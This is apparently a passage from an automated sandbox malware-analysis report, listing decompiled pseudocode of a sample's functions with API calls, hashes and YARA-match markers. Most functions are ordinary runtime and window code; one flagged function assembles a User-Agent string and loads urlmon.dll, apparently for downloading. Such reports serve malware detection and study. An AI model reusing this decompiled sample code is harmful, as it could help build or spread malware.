							goto L72;
						}
						__eflags =  *0xbe4914;
						if( *0xbe4914 != 0) {
							__eflags = _v24;
							if(_v24 == 0) {
								_v24 = 0x50;
							}
							__eflags = _v28;
							if(__eflags == 0) {
								_v28 = 0x96;
							}
							 *_t447 = 0xbe4914;
							_v176 = 1;
							_v172 = _v24;
							_v168 = _v28;
							_t287 = E00BC20E0(__eflags);
							_t448 = _t447 - 0x10;
							 *0xbe491c = _t287;
							__eflags = _t287;
							if(_t287 != 0) {
								__eflags = _v20;
								if(_v20 == 0) {
									 *_t448 = 0xbe4914;
									_t289 = E00BC2440(0);
									_t449 = _t448 - 4;
									__eflags = _t289;
									if(_t289 != 0) {
										 *_t449 =  &_v144;
										GetStartupInfoW(??);
										_t450 = _t449 - 4;
										 *_t450 = _v132;
										_t292 = E00BD1279();
										 *_t450 = 0xbe4914;
										_v176 = _v132;
										_v172 = _t292 << 1;
										E00BC27B0();
										_t451 = _t450 - 0xc;
										__eflags = _v100 & 0x00000001;
										if((_v100 & 0x00000001) == 0) {
											_v148 = 5;
										} else {
											_v148 = _v96 & 0x0000ffff;
										}
										_t380 =  *0xbe49bc; // 0x0
										 *_t451 = _t380;
										_v176 = _v148;
										ShowWindow(??, ??);
										_t452 = _t451 - 8;
										goto L71;
									} else {
										_v16 = 1;
									}
								} else {
									 *_t448 = 0xfffffff6;
									_t304 = GetStdHandle(??);
									_t454 = _t448 - 4;
									 *0xbe49c4 = _t304;
									 *_t454 = 0xfffffff5;
									_t305 = GetStdHandle(??);
									_t452 = _t454 - 4;
									 *0xbe49c8 = _t305;
									__eflags =  *0xbe49c4;
									if( *0xbe49c4 != 0) {
										L59:
										 *_t452 = 0xbe4914;
										E00BC2310();
										_t452 = _t452 - 4;
										__eflags =  *0xbe4920;
										if( *0xbe4920 != 0) {
											L62:
											goto L64;
										} else {
											 *_t452 = 0xbe4914;
											_t309 = E00BC23A0();
											_t452 = _t452 - 4;
											__eflags = _t309;
											if(_t309 != 0) {
												goto L62;
											} else {
												_v16 = 1;
											}
										}
									} else {
										__eflags =  *0xbe49c8;
										if( *0xbe49c8 == 0) {
											 *0xbe4928 = 1;
											L64:
											L71:
											 *_t452 = 0xbe4914;
											_v176 = _v32;
											_v16 = E00BC29E0();
										} else {
											goto L59;
										}
									}
								}
							} else {
								_v16 = 1;
							}
						} else {
							_v16 = 1;
						}
					} else {
						_v16 = 1;
					}
				} else {
					_v16 = 0;
				}
				L72:
				return _v16;
			}





























































                          0x00bc18e7
                          0x00bc18ee
                          0x00bc18f5
                          0x00bc18fc
                          0x00bc1903
                          0x00bc190a
                          0x00bc1911
                          0x00bc1918
                          0x00bc191f
                          0x00bc1926
                          0x00bc1932
                          0x00bc1939
                          0x00bc1961
                          0x00bc19a7
                          0x00bc19c3
                          0x00bc19ef
                          0x00bc19fe
                          0x00bc1a17
                          0x00bc1a1d
                          0x00bc1a20
                          0x00bc1a30
                          0x00bc1a3f
                          0x00bc1a52
                          0x00bc1a61
                          0x00bc1a74
                          0x00bc1a83
                          0x00bc1a96
                          0x00bc1aa6
                          0x00bc1ab5
                          0x00bc1ac4
                          0x00bc1ad7
                          0x00bc1aea
                          0x00bc1af9
                          0x00bc1b08
                          0x00bc1b18
                          0x00bc1b21
                          0x00bc1b27
                          0x00bc1b2a
                          0x00000000
                          0x00000000
                          0x00bc1b30
                          0x00bc1b38
                          0x00bc1b3a
                          0x00bc1b3d
                          0x00bc1b45
                          0x00bc1b4b
                          0x00bc1b51
                          0x00bc1b54
                          0x00bc1b59
                          0x00bc1b60
                          0x00bc1b63
                          0x00bc1b66
                          0x00000000
                          0x00000000
                          0x00bc1b6c
                          0x00bc1b7c
                          0x00bc1b7c
                          0x00bc1b84
                          0x00bc1b8a
                          0x00bc1b8f
                          0x00bc1b94
                          0x00bc1b9e
                          0x00bc1ba3
                          0x00bc1ba6
                          0x00bc1bae
                          0x00bc1bb3
                          0x00bc1bb8
                          0x00bc1bbb
                          0x00bc1bcd
                          0x00bc1bd4
                          0x00bc1bd7
                          0x00bc1bda
                          0x00000000
                          0x00000000
                          0x00bc1bf0
                          0x00bc1bf3
                          0x00bc1bf7
                          0x00bc1bfc
                          0x00bc1bff
                          0x00bc1c21
                          0x00bc1c24
                          0x00bc1c28
                          0x00bc1c2d
                          0x00bc1c30
                          0x00bc1c66
                          0x00bc1c69
                          0x00bc1c6d
                          0x00bc1c72
                          0x00bc1c75
                          0x00bc1d13
                          0x00bc1d16
                          0x00bc1d1a
                          0x00bc1d1f
                          0x00bc1d22
                          0x00bc1dc0
                          0x00bc1dc3
                          0x00bc1dc7
                          0x00bc1dcc
                          0x00bc1dcf
                          0x00bc1e47
                          0x00bc1e4a
                          0x00bc1e4e
                          0x00bc1e53
                          0x00bc1e56
                          0x00bc1ec0
                          0x00bc1e5c
                          0x00bc1e5f
                          0x00bc1e62
                          0x00bc1e65
                          0x00bc1e68
                          0x00bc1e89
                          0x00bc1e8c
                          0x00bc1e90
                          0x00bc1e9d
                          0x00bc1ea5
                          0x00bc1ea9
                          0x00000000
                          0x00bc1eaf
                          0x00bc1eaf
                          0x00bc1eaf
                          0x00bc1e6e
                          0x00bc1e6e
                          0x00bc1e6e
                          0x00bc1e68
                          0x00bc1dd5
                          0x00bc1dd8
                          0x00bc1ddb
                          0x00bc1dde
                          0x00bc1de1
                          0x00bc1e02
                          0x00bc1e05
                          0x00bc1e09
                          0x00bc1e16
                          0x00bc1e1c
                          0x00bc1e20
                          0x00000000
                          0x00bc1e26
                          0x00bc1e26
                          0x00bc1e26
                          0x00bc1de7
                          0x00bc1de7
                          0x00bc1de7
                          0x00bc1de1
                          0x00bc1d28
                          0x00bc1d2b
                          0x00bc1d2e
                          0x00bc1d31
                          0x00bc1d34
                          0x00bc1d55
                          0x00bc1d58
                          0x00bc1d5c
                          0x00bc1d69
                          0x00bc1d6c
                          0x00bc1d70
                          0x00bc1d83
                          0x00bc1d83
                          0x00bc1d8a
                          0x00000000
                          0x00bc1d90
                          0x00bc1d96
                          0x00bc1d99
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bc1d99
                          0x00bc1d76
                          0x00bc1d76
                          0x00bc1d7d
                          0x00bc1d9f
                          0x00bc1d9f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bc1d7d
                          0x00bc1d3a
                          0x00bc1d3a
                          0x00bc1d3a
                          0x00bc1d34
                          0x00bc1c7b
                          0x00bc1c7e
                          0x00bc1c81
                          0x00bc1c84
                          0x00bc1c87
                          0x00bc1ca8
                          0x00bc1cab
                          0x00bc1caf
                          0x00bc1cbc
                          0x00bc1cbf
                          0x00bc1cc3
                          0x00bc1cd6
                          0x00bc1cd6
                          0x00bc1cdd
                          0x00000000
                          0x00bc1ce3
                          0x00bc1ce9
                          0x00bc1cec
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bc1cec
                          0x00bc1cc9
                          0x00bc1cc9
                          0x00bc1cd0
                          0x00bc1cf2
                          0x00bc1cf2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bc1cd0
                          0x00bc1c8d
                          0x00bc1c8d
                          0x00bc1c8d
                          0x00bc1c87
                          0x00bc1c36
                          0x00bc1c36
                          0x00bc1c40
                          0x00bc1c4a
                          0x00000000
                          0x00bc1c4a
                          0x00bc1c05
                          0x00bc1c05
                          0x00bc1ecc
                          0x00bc1ed2
                          0x00000000
                          0x00bc1ed2
                          0x00000000
                          0x00bc1bff
                          0x00bc1eda
                          0x00bc1ee1
                          0x00bc1ef3
                          0x00bc1ef7
                          0x00bc1efd
                          0x00bc1efd
                          0x00bc1f04
                          0x00bc1f08
                          0x00bc1f0e
                          0x00bc1f0e
                          0x00bc1f21
                          0x00bc1f24
                          0x00bc1f2c
                          0x00bc1f30
                          0x00bc1f34
                          0x00bc1f39
                          0x00bc1f3c
                          0x00bc1f41
                          0x00bc1f44
                          0x00bc1f56
                          0x00bc1f5a
                          0x00bc2002
                          0x00bc2005
                          0x00bc200a
                          0x00bc200d
                          0x00bc2010
                          0x00bc2028
                          0x00bc202b
                          0x00bc2031
                          0x00bc2037
                          0x00bc203a
                          0x00bc204b
                          0x00bc204e
                          0x00bc2052
                          0x00bc2056
                          0x00bc205b
                          0x00bc2064
                          0x00bc2067
                          0x00bc2081
                          0x00bc206d
                          0x00bc2071
                          0x00bc2071
                          0x00bc2092
                          0x00bc2098
                          0x00bc209b
                          0x00bc209f
                          0x00bc20a5
                          0x00000000
                          0x00bc2016
                          0x00bc2016
                          0x00bc2016
                          0x00bc1f60
                          0x00bc1f60
                          0x00bc1f67
                          0x00bc1f6d
                          0x00bc1f70
                          0x00bc1f75
                          0x00bc1f7c
                          0x00bc1f82
                          0x00bc1f85
                          0x00bc1f8a
                          0x00bc1f91
                          0x00bc1fa4
                          0x00bc1faa
                          0x00bc1fad
                          0x00bc1fb2
                          0x00bc1fb5
                          0x00bc1fbc
                          0x00bc1fe8
                          0x00000000
                          0x00bc1fc2
                          0x00bc1fc8
                          0x00bc1fcb
                          0x00bc1fd0
                          0x00bc1fd3
                          0x00bc1fd6
                          0x00000000
                          0x00bc1fdc
                          0x00bc1fdc
                          0x00bc1fdc
                          0x00bc1fd6
                          0x00bc1f97
                          0x00bc1f97
                          0x00bc1f9e
                          0x00bc1fed
                          0x00bc1ff7
                          0x00bc20a8
                          0x00bc20b1
                          0x00bc20b4
                          0x00bc20c0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bc1f9e
                          0x00bc1f91
                          0x00bc1f4a
                          0x00bc1f4a
                          0x00bc1f4a
                          0x00bc1ee7
                          0x00bc1ee7
                          0x00bc1ee7
                          0x00bc1bc1
                          0x00bc1bc1
                          0x00bc1bc1
                          0x00bc193f
                          0x00bc193f
                          0x00bc193f
                          0x00bc20c3
                          0x00bc20cf

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: File$AllocCreateReadSizeVirtual
                          • String ID: --headless$--height$--server$--signal$--unix$--width$@$P$T
                          • API String ID: 4119528295-967118136
                          • Opcode ID: 9ab61fb9b5e19d3e5e534596614c1fb4ed207945431fbda0d98b46432ecbbf85
                          • Instruction ID: dca981e0c36c3079ce203420baf95ebd3b28f813944dc18daac4d4b09ec34d07
                          • Opcode Fuzzy Hash: 9ab61fb9b5e19d3e5e534596614c1fb4ed207945431fbda0d98b46432ecbbf85
                          • Instruction Fuzzy Hash: 3D32E4B4909258CFDB10DFA8D484BADBBF0FF49304F11489EE885AB392D7759985CB12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD53A7 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 80%
                          			E00BD53A7(WCHAR* _a4, signed int _a8, char* _a12) {
				signed int _v8;
				short _v552;
				short _v554;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				signed int _v608;
				signed int _v612;
				intOrPtr _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed char _t32;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				int _t48;
				signed int* _t59;
				char* _t60;
				WCHAR* _t68;
				signed int _t70;
				void* _t71;

				_t30 =  *0xbe4050; // 0xbb40e64e
				_v8 = _t30 ^ _t70;
				_t65 = _a8;
				_t60 = _a12;
				_t68 = _a4;
				_v608 = _t60;
				if(_t65 != _t68) {
					while(E00BD551D( *_t65 & 0x0000ffff) == 0) {
						_t65 = _t65 - 2;
						if(_t65 != _t68) {
							continue;
						}
						break;
					}
					_t60 = _v608;
				}
				_t69 =  *_t65 & 0x0000ffff;
				if(( *_t65 & 0x0000ffff) != 0x3a) {
					L8:
					_t60 =  &_v601;
					_t32 = E00BD551D(_t69);
					_t65 = (_t65 - _t68 >> 1) + 1;
					asm("sbb eax, eax");
					_t59 = 0;
					_v612 =  ~(_t32 & 0x000000ff) & _t65;
					_t69 = FindFirstFileExW(_t68, 0,  &_v600, 0, 0, 0);
					if(_t69 != 0xffffffff) {
						_t59 = _v608;
						_v608 = _t59[1] -  *_t59 >> 2;
						_t41 = 0x2e;
						do {
							if(_v600.cFileName != _t41 || _v554 != 0 && (_v554 != _t41 || _v552 != 0)) {
								_push(_t59);
								_t43 = E00BD52F3(_t60,  &(_v600.cFileName), _t68, _v612);
								_t71 = _t71 + 0x10;
								_v616 = _t43;
								if(_t43 != 0) {
									FindClose(_t69);
									_t45 = _v616;
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
							goto L21;
							L16:
							_t48 = FindNextFileW(_t69,  &_v600);
							_t41 = 0x2e;
						} while (_t48 != 0);
						_t65 =  *_t59;
						_t63 = _v608;
						_t51 = _t59[1] -  *_t59 >> 2;
						if(_v608 != _t59[1] -  *_t59 >> 2) {
							E00BD8110(_t65, _t65 + _t63 * 4, _t51 - _t63, 4, E00BD5541);
						}
						FindClose(_t69);
						_t45 = 0;
					} else {
						_push(_v608);
						goto L7;
					}
				} else {
					_t8 =  &(_t68[1]); // 0x2
					if(_t65 == _t8) {
						goto L8;
					} else {
						_push(_t60);
						_t59 = 0;
						L7:
						_t45 = E00BD52F3(_t60, _t68, _t59, _t59);
					}
				}
				L21:
				return E00BCDB85(_t45, _t59, _v8 ^ _t70, _t65, _t68, _t69);
			}

























                          0x00bd53b2
                          0x00bd53b9
                          0x00bd53bc
                          0x00bd53bf
                          0x00bd53c5
                          0x00bd53c8
                          0x00bd53d0
                          0x00bd53d2
                          0x00bd53e5
                          0x00bd53ea
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd53ea
                          0x00bd53ec
                          0x00bd53ec
                          0x00bd53f2
                          0x00bd53f8
                          0x00bd5414
                          0x00bd5415
                          0x00bd541b
                          0x00bd5427
                          0x00bd542a
                          0x00bd542c
                          0x00bd5433
                          0x00bd5448
                          0x00bd544d
                          0x00bd5457
                          0x00bd5467
                          0x00bd546d
                          0x00bd546e
                          0x00bd5475
                          0x00bd5494
                          0x00bd54a3
                          0x00bd54a8
                          0x00bd54ab
                          0x00bd54b3
                          0x00bd5502
                          0x00bd5508
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd54b5
                          0x00bd54bd
                          0x00bd54c7
                          0x00bd54c7
                          0x00bd54cd
                          0x00bd54d1
                          0x00bd54d7
                          0x00bd54dc
                          0x00bd54f7
                          0x00bd54fc
                          0x00bd54df
                          0x00bd54e5
                          0x00bd544f
                          0x00bd544f
                          0x00000000
                          0x00bd544f
                          0x00bd53fa
                          0x00bd53fa
                          0x00bd53ff
                          0x00000000
                          0x00bd5401
                          0x00bd5401
                          0x00bd5402
                          0x00bd5404
                          0x00bd5407
                          0x00bd540c
                          0x00bd53ff
                          0x00bd550e
                          0x00bd551c

                          APIs
                          • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BD5442
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00BD54BD
                          • FindClose.KERNEL32(00000000), ref: 00BD54DF
                          • FindClose.KERNEL32(00000000), ref: 00BD5502
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID:
                          • API String ID: 1164774033-0
                          • Opcode ID: 75c1cfcc04661c3bbec8b82324dc35a1b62f1ea69883c8a34113ff61d83d2d71
                          • Instruction ID: 2464214f19c9761acd8592bfd5fd24200a0b71ce344ef28ea14a961596cf3e2a
                          • Opcode Fuzzy Hash: 75c1cfcc04661c3bbec8b82324dc35a1b62f1ea69883c8a34113ff61d83d2d71
                          • Instruction Fuzzy Hash: E741A271900919AFDB30DF68DC89AAEF7F9EB84355F1081E6E40597344FA309E848F61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCD78C Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E00BCD78C(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00BCD700(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00BCFC90(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00BCFC90(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00BCD700(_t49);
				}
				return _t49;
			}


































                          0x00bcd78c
                          0x00bcd78c
                          0x00bcd78c
                          0x00bcd7a0
                          0x00bcd7a2
                          0x00bcd7a5
                          0x00bcd7a5
                          0x00bcd7a9
                          0x00bcd7ae
                          0x00bcd7c6
                          0x00bcd7cc
                          0x00bcd7d2
                          0x00bcd7d8
                          0x00bcd7de
                          0x00bcd7e4
                          0x00bcd7ea
                          0x00bcd7f1
                          0x00bcd7f8
                          0x00bcd7ff
                          0x00bcd806
                          0x00bcd80d
                          0x00bcd814
                          0x00bcd815
                          0x00bcd81e
                          0x00bcd824
                          0x00bcd827
                          0x00bcd82d
                          0x00bcd83c
                          0x00bcd848
                          0x00bcd853
                          0x00bcd85a
                          0x00bcd861
                          0x00bcd86c
                          0x00bcd874
                          0x00bcd87d
                          0x00bcd87f
                          0x00bcd882
                          0x00bcd884
                          0x00bcd88e
                          0x00bcd896
                          0x00bcd89c
                          0x00000000
                          0x00bcd8a3
                          0x00bcd8a6

                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BCD798
                          • IsDebuggerPresent.KERNEL32 ref: 00BCD864
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BCD884
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00BCD88E
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: 4be5f0758baf783e0949aeca35ba956c5b5306a1b09f0b246cea2afb22e0d3cc
                          • Instruction ID: ea7e3a4fbeaefdc7ae339ae80b2a2dac15500ea854a3a5231e771ab819eb7302
                          • Opcode Fuzzy Hash: 4be5f0758baf783e0949aeca35ba956c5b5306a1b09f0b246cea2afb22e0d3cc
                          • Instruction Fuzzy Hash: 8D310579D412189BDB11EFA4D989BCDBBF8EF08304F1041EAE40DAB250EB719A848F45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041732C Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                          Download Yara Rule
                          C-Code - Quality: 35%
                          			E0041732C(void* __eax, void* __eflags) {
				intOrPtr* _t14;
				void* _t16;
				void* _t20;
				intOrPtr* _t26;
				void* _t30;

				if(__eflags != 0) {
					 *((intOrPtr*)(_t30 - 0x10)) = 0x412d7265;
					 *((intOrPtr*)(_t30 - 0xc)) = 0x746e6567;
					 *((intOrPtr*)(_t30 - 8)) = 0x203a;
					E0041BDE0();
					_t5 = _t30 - 0x24; // 0x6d6c7275
					_t26 = E00414E50( *((intOrPtr*)(_t30 + 8)) + 0xc94, E0040ACF0(_t16,  *((intOrPtr*)(_t30 + 8)) + 0xc94, __eflags,  *((intOrPtr*)(_t30 + 8)) + 0xc94, _t5), 0, 0, 0x69767207);
					__eflags = _t26;
					if(_t26 == 0) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						_t14 =  *_t26(0, E0041C0B0(_t20) + _t20, _t30 - 4);
						__eflags = _t14;
						if(_t14 != 0) {
							goto L5;
						} else {
							return 1;
						}
					}
				} else {
					asm("int 0x5c");
					_push(_t20);
					return __eax;
				}
			}








                          0x0041732d
                          0x00417380
                          0x00417387
                          0x0041738e
                          0x00417395
                          0x0041739d
                          0x004173bd
                          0x004173c2
                          0x004173c4
                          0x004173e9
                          0x004173ea
                          0x004173f0
                          0x004173c6
                          0x004173d8
                          0x004173da
                          0x004173dc
                          0x00000000
                          0x004173de
                          0x004173e8
                          0x004173e8
                          0x004173dc
                          0x0041732f
                          0x0041732f
                          0x00417331
                          0x0041733c
                          0x0041733c

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: : $er-A$gent$urlmon.dll
                          • API String ID: 0-3839042805
                          • Opcode ID: fc61a7cd1f8c49fc05e6eb29e62a19e9fd2998f5f391a8e557c7e6d5172c348d
                          • Instruction ID: 169f46a9b9918c7cb099a491cb9c1deffe5abaae0d30dbc9755bffd049fda764
                          • Opcode Fuzzy Hash: fc61a7cd1f8c49fc05e6eb29e62a19e9fd2998f5f391a8e557c7e6d5172c348d
                          • Instruction Fuzzy Hash: 9AF02DB2E4111967D7109A829C42FFEB7789B41718F10015BFD08B7240D67D9E4283DA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040E47D Relevance: .0, Instructions: 13COMMON
                          Download Yara Rule
                          C-Code - Quality: 68%
                          			E0040E47D(void* __eax, void* __edi, void* __esi) {
				signed int _t13;

				asm("scasd");
				 *(__edi - 0x30) =  *(__edi - 0x30) & 0x00000003;
				 *((char*)(__esi + _t13 * 2)) =  *((char*)(__esi + _t13 * 2)) - 0xa1;
				return __eax;
			}




                          0x0040e47d
                          0x0040e47e
                          0x0040e482
                          0x0040e490

                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d072282c666989d14e148d59b3494a38707f11cf8d8986fdab30b1e8bc262dc9
                          • Instruction ID: b3356cf7d152068a79534433ab65292708035814959c2615a7c03780d35168cb
                          • Opcode Fuzzy Hash: d072282c666989d14e148d59b3494a38707f11cf8d8986fdab30b1e8bc262dc9
                          • Instruction Fuzzy Hash: 04C02B03F1958400C3210B39B4001F8FB50C383037E0023D7CCCCB34D1035180120748
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCBF90 Relevance: 42.3, APIs: 28, Instructions: 296COMMON
                          Download Yara Rule
                          C-Code - Quality: 48%
                          			E00BCBF90(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
				long _v12;
				long _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _v124;
				void* _v128;
				intOrPtr _v132;
				long _v136;
				signed int _v140;
				void* _v144;
				struct tagRECT _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _v176;
				void* _v180;
				void* _v184;
				signed int* _v188;
				void* _v204;
				RECT* _v208;
				intOrPtr _v212;
				signed int _v216;
				signed int _v228;
				signed int _v232;
				signed int _v240;
				intOrPtr _v244;
				void* _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v276;
				signed int _v280;
				void* _v292;
				void* _v296;
				int _t176;
				long _t186;
				struct HBRUSH__* _t208;
				long _t214;
				void* _t218;
				intOrPtr _t236;
				void* _t245;
				void* _t326;
				struct HDC__** _t330;
				struct HDC__** _t332;
				struct HDC__** _t336;
				struct HDC__** _t337;
				struct HDC__** _t338;
				struct HDC__** _t341;
				struct HDC__** _t342;
				void* _t343;
				struct HDC__** _t344;

				_t176 = _a8;
				_v160 = _t176;
				if(_t176 == 0xf) {
					BeginPaint(_a4,  &_v80);
					GetClientRect(_a4,  &_v96);
					asm("cdq");
					_v120 = _v96.right / 8;
					_t186 = GetWindowLongW(GetParent(_a4), 8);
					_t330 = _t326 - 0xfffffffffffffff4;
					_v16 = _t186;
					_v116 = 0;
					while(_v116 < 0x10) {
						asm("cdq");
						_v168 = _v116 / 8;
						asm("cdq");
						_v108 = _v168 * _v96.bottom / 2;
						_v164 = _v108;
						asm("cdq");
						_v100 = _v164 + _v96.bottom / 2;
						_v112 = (_v116 & 0x00000007) * _v120;
						_v104 = _v112 + _v120;
						_t208 = CreateSolidBrush( *(_v16 + 4 + _v116 * 4));
						_t332 = _t330 - 4;
						_v124 = _t208;
						 *_t332 = _v80.hdc;
						_v188 =  &_v112;
						_v184 = _v124;
						FillRect(??, ??, ??);
						DeleteObject(_v124);
						_t214 = GetWindowLongW(_a4, 0);
						_t330 = _t332;
						if(_t214 == _v116) {
							_v132 = 2;
							_t218 = SelectObject(_v80.hdc, GetStockObject(6));
							_t336 = _t330 - 0xfffffffffffffffc;
							_v128 = _t218;
							_v104 = _v104 + 0xffffffff;
							_v100 = _v100 + 0xffffffff;
							while(1) {
								 *_t336 = _v80.hdc;
								_v216 = _v112;
								_v212 = _v100;
								_v208 = 0;
								MoveToEx(??, ??, ??, ??);
								_t337 = _t336 - 0x10;
								 *_t337 = _v80.hdc;
								_v232 = _v112;
								_v228 = _v108;
								LineTo(??, ??, ??);
								_t338 = _t337 - 0xc;
								 *_t338 = _v80.hdc;
								_v244 = _v104;
								_v240 = _v108;
								LineTo(??, ??, ??);
								SelectObject(_v80.hdc, GetStockObject(7));
								_t341 = _t338;
								 *_t341 = _v80.hdc;
								_v268 = _v104;
								_v264 = _v100;
								LineTo(??, ??, ??);
								_t342 = _t341 - 0xc;
								 *_t342 = _v80.hdc;
								_v280 = _v112;
								_v276 = _v100;
								LineTo(??, ??, ??);
								_t343 = _t342 - 0xc;
								_t236 = _v132 + 0xffffffff;
								_v132 = _t236;
								if(_t236 == 0) {
									break;
								}
								_v112 = _v112 + 1;
								_v108 = _v108 + 1;
								_v104 = _v104 + 0xffffffff;
								_v100 = _v100 + 0xffffffff;
								_t245 = GetStockObject(6);
								_t344 = _t343 - 4;
								 *_t344 = _v80.hdc;
								_v296 = _t245;
								SelectObject(??, ??);
								_t336 = _t344 - 8;
							}
							SelectObject(_v80, _v128);
							_t330 = _t343 - 8;
						}
						_v116 = _v116 + 1;
					}
					EndPaint(_a4,  &_v80);
					goto L17;
				} else {
					if(_v160 == 0x201) {
						GetClientRect(_a4,  &_v156);
